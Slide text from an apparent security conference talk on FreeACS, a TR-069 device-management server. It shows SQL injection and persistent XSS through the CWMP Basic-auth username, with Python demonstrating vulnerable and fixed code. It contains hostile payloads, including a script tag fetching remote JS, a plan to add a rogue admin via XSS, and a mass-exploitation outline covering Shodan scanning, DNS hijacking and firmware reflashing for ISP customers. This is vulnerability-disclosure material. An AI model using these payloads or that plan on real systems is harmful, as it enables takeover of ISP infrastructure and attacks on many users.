CWMP NOTIFY AND BASIC AUTH
• Turns out the HTTP Basic auth “username” is used to denote which device.
• Used as a unique identifier.
• So it’s fed into things and messed with… and Basic auth puts almost no constraints on what a username may contain (anything but a colon).
THE POSSIBLY UNEXPLOITABLE…
• TL;DR: the Basic auth username is passed into a SQL query with no sanitizing.
• It leads to a fairly trivial SQL injection vulnerability (in theory).
• However, there is a char-length limit that meant I couldn’t get anything working easily. Someone else might figure it out.
• You CAN cause a perma-DoS of the ACS, however, with a broken SQL statement…
THE EASILY EXPLOITABLE
• Username is totally unsanitized.
• Username shows up in the UI a load of times when doing ACS admin things.
• So maybe we can get some nice XSS?
PERSISTENT XSS IN ADMIN
• TL;DR it worked.
• Persistent XSS in admin area via a CWMP Notify message.
• Some payload limitations – char length and the likes…
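
The whole chain from the Inform message through to the two ACS-side sinks the slides describe (the string-built SQL lookup, and the admin UI echoing the unit identifier), as an added example that is not FreeACS code: the ‘unit’ table, its columns, the lookup and the rendering helpers are hypothetical stand-ins for the ACS internals, the rows and the hostile usernames are constructed, and sqlite3 stands in for MySQL. The slides say “Notify”; the CWMP RPC a CPE opens a session with is Inform, which is what the builder produces.

```python
"""CWMP Inform with a hostile Basic-auth username, plus the two ACS-side sinks
the slides describe.  Added example, not FreeACS code: the 'unit' table, the
lookup and rendering helpers are hypothetical stand-ins for the ACS internals."""
import base64
import html
import sqlite3
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
CWMP_NS = "urn:dslforum-org:cwmp-1-0"


def build_inform(username: str, password: str, serial: str) -> tuple[dict, str]:
    """Headers and body of a minimal Inform (event 0 BOOTSTRAP).  The identity
    the ACS keys on rides in the Basic-auth user-id, not in the XML."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    headers = {
        "Authorization": f"Basic {token}",
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPAction": "",
    }
    body = (
        f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:cwmp="{CWMP_NS}">'
        '<soapenv:Header><cwmp:ID soapenv:mustUnderstand="1">1</cwmp:ID></soapenv:Header>'
        "<soapenv:Body><cwmp:Inform>"
        "<DeviceId><Manufacturer>Example</Manufacturer><OUI>000000</OUI>"
        f"<ProductClass>CPE</ProductClass><SerialNumber>{escape(serial)}</SerialNumber></DeviceId>"
        "<Event><EventStruct><EventCode>0 BOOTSTRAP</EventCode><CommandKey></CommandKey></EventStruct></Event>"
        "<MaxEnvelopes>1</MaxEnvelopes><CurrentTime>2017-04-01T00:00:00Z</CurrentTime>"
        "<RetryCount>0</RetryCount><ParameterList></ParameterList>"
        "</cwmp:Inform></soapenv:Body></soapenv:Envelope>"
    )
    return headers, body


def username_from_basic_auth(header: str) -> str:
    """Decode the user-id the ACS treats as the unit identifier.  RFC 7617
    forbids only ':' in it, so quotes and angle brackets pass untouched."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic auth")
    user, _, _password = base64.b64decode(token).decode("utf-8").partition(":")
    return user


def make_acs_db() -> sqlite3.Connection:
    """Stand-in for the ACS database, with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE unit (unit_id TEXT PRIMARY KEY, profile TEXT, secret TEXT)")
    db.executemany("INSERT INTO unit VALUES (?, ?, ?)", [
        ("000000-CPE-SN1001", "Speedport", "s3cret-1001"),
        ("000000-CPE-SN1002", "DSL-Basic", "s3cret-1002"),
    ])
    return db


def lookup_unit_unsafe(db: sqlite3.Connection, username: str) -> list:
    """The pattern the slides describe: the username concatenated into SQL."""
    return db.execute(
        f"SELECT unit_id, secret FROM unit WHERE unit_id = '{username}'"
    ).fetchall()


def lookup_unit_safe(db: sqlite3.Connection, username: str) -> list:
    """Parameterised: the username can only ever be compared, never parsed."""
    return db.execute(
        "SELECT unit_id, secret FROM unit WHERE unit_id = ?", (username,)
    ).fetchall()


def unsafe_query_breaks(db: sqlite3.Connection, username: str) -> bool:
    """A username that leaves the statement malformed errors out every time
    that unit is touched: the perma-DoS the slides mention."""
    try:
        lookup_unit_unsafe(db, username)
    except sqlite3.OperationalError:
        return True
    return False


def render_unit_cell_unsafe(username: str) -> str:
    """Admin UI echoing the identifier as-is: the persistent XSS sink."""
    return f"<td>{username}</td>"


def render_unit_cell_safe(username: str) -> str:
    return f"<td>{html.escape(username, quote=True)}</td>"


# Constructed hostile usernames (the IP is from the documentation range).
SQLI_USER = "' OR '1'='1"
XSS_USER = "<script src=//198.51.100.7/a.js></script>"
```

Both sinks have the same root cause: the ACS trusts a field that is nothing more than what the remote end put in its Authorization header. Parameterising the query and escaping on output are the minimum; an ACS should also reject any unit identifier that does not match the format it issues.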
POC – INJECTING A REMOTE SCRIPT…
SO WE CAN INJECT REMOTE JS INTO ADMIN…
• Now let’s fully take over the ACS…
• I figured the easiest way to do this is to add a new admin user…
• So let’s look at how that plays out…
ADDING A NEW ADMIN USER
• It is just a POST request.
• No CSRF tokens or XSS protection going on here, so the injected script can issue that POST with the logged-in admin’s own session.
• We can do this in JavaScript we copied and pasted from Stack Overflow!
ADDING ADMIN USER VIA XSS POC…
ADMIN USER NAMED HACKER ADDED ;)
SO… WHAT DO…
• Scan internet/Shodan/Censys/Google for FreeACS servers.
• Inject our XSS via CWMP NOTIFY message.
• Wait a while for payloads to fire…
• Hack the Planet!
WHAT WE CAN DO WITH HACKED ACS?
• We can reconfigure settings on all clients (think: all users of the ISP).
• Change everyone’s DNS servers for a mass pharming attack or worse :D
• We can reflash firmwares on all clients – persistent mass rootkitting.
• Imagine the cleanup costs of this?
• We can probably mess with billing or provision new devices, perhaps…
WITH A BIT OF HACKED ACS… WE ARE LIKE THIS!
THANKS
• BSides Edinburgh organizers!
• Shahar Tal, kenzo, and others for the prior art.
• Coworkers and friends (LizardHQ, etc…) for helping.
• Cybergibbons and Ken from PTP.
• The DSL Forum, for writing hilarious specs.
• Vendors and software developers for keeping me in a job.
• You, for putting up with this utter nonsense.
YOU MAY SUBSCRIBE TO MY NEWSLETTER
• Email (which constantly goes unanswered): darren.martyn@xiphosresearch.co.uk
• XMPP (will be ignored if you don’t use OTR…): infodox@jabber.ccc.de
• Twitter (actually might get a response!): @info_dox
• mastodon.social (the new super hip not-Twitter thing): @lsd